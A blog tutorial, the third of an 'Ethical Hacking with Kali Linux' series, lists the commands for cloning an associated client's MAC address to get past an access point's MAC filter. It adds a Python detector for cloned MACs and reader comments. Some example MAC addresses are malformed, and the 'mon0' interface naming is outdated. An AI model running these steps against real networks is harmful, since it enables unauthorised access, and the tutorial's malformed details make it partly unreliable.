Ethical Hacking with Kali Linux – Part 3: Bypassing the MAC Address Filter

April 1, 2016 | Views: 23270



Welcome all, to this series on Kali Linux for ethical hacking. This is the third part, and I'll explain the process of bypassing the MAC address filter on an AP (Access Point).

 

# 3 Basic Process:

– Finding the AP: airmon-ng & airodump-ng

– Finding an associated client: airodump-ng

– Finally, using macchanger

 

# . . . Let’s Begin

– Before starting, make sure that eth0, lo and wlan0 are all up. (Open a terminal and run ifconfig.)

– Put the wireless interface into monitor mode. Run:

airmon-ng start wlan0

– After executing the above command, you should get a new interface, mon0 (monitor mode enabled).

– Verify that both interfaces are up and running; run:

airmon-ng

– Check that both wlan0 and mon0 are listed, then run:

airodump-ng mon0

– This lists all the APs that the Kali Linux machine can see.

– In the output you'll get each AP's BSSID and ESSID, channel and cipher. If an SSID is hidden, the ESSID column will show something like <length: 0>, or no SSID at all.

Note: We saw in the second part how to uncover a hidden SSID. Here, though, you can use any SSID with open encryption, or an SSID whose password you know.

– We will use the MAC address seen in part 2, i.e. 00:A1:B2:11:20:13:5T, on channel 1. (Assume MAC address filtering is enabled on this AP, and suppose its SSID is nhc-BJ.)

– Now we try to find a client associated with this AP (nhc-BJ) and its MAC address, so that we can use that MAC to bypass the filter. Run:

airodump-ng -c 1 -a --bssid 00:A1:B2:11:20:13:5T mon0

(-c is the channel, which is 1 for the BSSID we're trying to connect to. -a shows only the clients associated with this BSSID.)

– You'll get the MAC address of the station associated with that AP; this is the client's station. (Let's assume its MAC is 00:C1:52:11:20:13:7D.)

– Press CTRL+C.

– Run:

macchanger --help
(notice that -m sets the MAC)

– Run:

macchanger -m 00:C1:52:11:20:13:7D wlan0

(If you get a "Device or resource busy" error, run the following command first:)

airmon-ng stop wlan0

– Run:

macchanger -m 00:C1:52:11:20:13:7D wlan0

(If successful, you'll see a message like 'faked MAC'.)

– Run:

ifconfig wlan0 down

ifconfig wlan0 up

(Let's see whether we can associate with the SSID now using this faked MAC.)

– Run:

iwconfig wlan0 essid nhc-BJ channel 1

(If this does not work in Kali, run it in BackTrack, or see an updated version of Kali.)

iwconfig wlan0

(If successful, the Access Point will be associated.)
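The steps above show why a MAC filter is not authentication: the cloned address looks identical to the legitimate client. One thing a defender can still see is that two radios sharing one address produce two interleaved 802.11 sequence-number counters instead of one monotonic counter. The following script is an added example, not part of the original post; it takes (timestamp, source MAC, sequence number) tuples as you would parse them from a monitor-mode capture, and the sample frames and MAC addresses are constructed.

```python
"""Flag client MACs whose 802.11 sequence numbers are not monotonic."""
from collections import defaultdict

SEQ_MODULO = 4096        # 802.11 sequence numbers are 12 bits
MAX_FORWARD_GAP = 64     # larger forward jumps are suspicious (threshold is an assumption)
MAX_BACKWARD_GAP = 8     # tolerate small reordering/retries, not real regressions


def seq_delta(prev, cur):
    """Signed distance from prev to cur on the 12-bit ring, in (-2048, 2048]."""
    d = (cur - prev) % SEQ_MODULO
    return d - SEQ_MODULO if d > SEQ_MODULO // 2 else d


def find_cloned_macs(frames):
    """Return {mac: [(ts, prev_seq, cur_seq), ...]} for every discontinuity seen.

    A single radio increments its counter by one per frame (with a wrap at 4095),
    so a MAC that alternates between two distant counters is probably two devices.
    """
    last = {}
    anomalies = defaultdict(list)
    for ts, mac, seq in sorted(frames):      # process in time order
        mac = mac.lower()
        if mac in last:
            d = seq_delta(last[mac], seq)
            if d < -MAX_BACKWARD_GAP or d > MAX_FORWARD_GAP:
                anomalies[mac].append((ts, last[mac], seq))
        last[mac] = seq
    return dict(anomalies)


# Constructed sample: the real client counts 100, 101, 102, ...; a second radio
# using the same (cloned) address transmits with its own counter near 3000.
SAMPLE_FRAMES = [
    (1.0, "02:c1:52:11:20:7d", 100),
    (1.1, "02:c1:52:11:20:7d", 101),
    (1.2, "02:c1:52:11:20:7d", 3000),   # clone appears
    (1.3, "02:c1:52:11:20:7d", 102),    # real client continues
    (1.4, "02:c1:52:11:20:7d", 3001),
    (2.0, "02:aa:bb:cc:dd:01", 4094),
    (2.1, "02:aa:bb:cc:dd:01", 4095),
    (2.2, "02:aa:bb:cc:dd:01", 0),      # normal 12-bit wrap, not an anomaly
]

if __name__ == "__main__":
    for mac, events in find_cloned_macs(SAMPLE_FRAMES).items():
        print(f"{mac}: {len(events)} sequence-number discontinuities, possible clone")
```

Sequence numbers are not a proof on their own (retransmissions and driver quirks cause small gaps), so treat a hit as a trigger to correlate with signal strength and association logs.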

 

A quick note: This series is only for educational purposes. Practice this series in a lab, on a virtual or separate network, and always avoid illegal activities. If you can, then support us in fighting the bad guys.

See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)


By: BIJAY ACHARYA  (twitter : @acharya_bijay)

11 Comments
  1. I found this “issue” interesting when using airmon-ng for Kali 2.0

    http://stackoverflow.com/questions/32025472/airodump-ng-wlan0mon-doesnt-work

  2. Would be very interested in the update to the question by Muckvanity.

    bj achary

    A well written article and my thanks for your time and considerable effort in producing the series.

    Mightyhash

  3. mon0? Is this a cut and paste job?

    I think you may be doing those who don’t know this stuff a great disservice by posting outdated information.

    As I see it you have “created” this write-up within the last 2 months. mon0, mon1 etc. have not been used in airmon-ng for over a year. Instead wlan0mon, wlan1mon and so on are used to represent monitor mode.

    Please tell me if I’m wrong here for some reason… I’m often called an asshole for pointing stuff like this out but in my opinion I’d be a bigger asshole did I not let the author know, along with any of his readers I may reach, that there are some much better, far more current tutorials on this subject matter on this site… https://www.cybrary.it/video/wireless-intro/

    Now please don’t walk away thinking you are stupid or have done anything wrong. You have obviously worked very hard on what is a fantastic piece of work. It would have a better chance of earning a gold star however, and would be better shown off to others, if it were affixed to your fridge with a magnet rather than published as a tutorial at a place where people come to learn things.

  4. can I add you on facebook?? please provide me your facebook id

  5. Can you do this process in Windows?
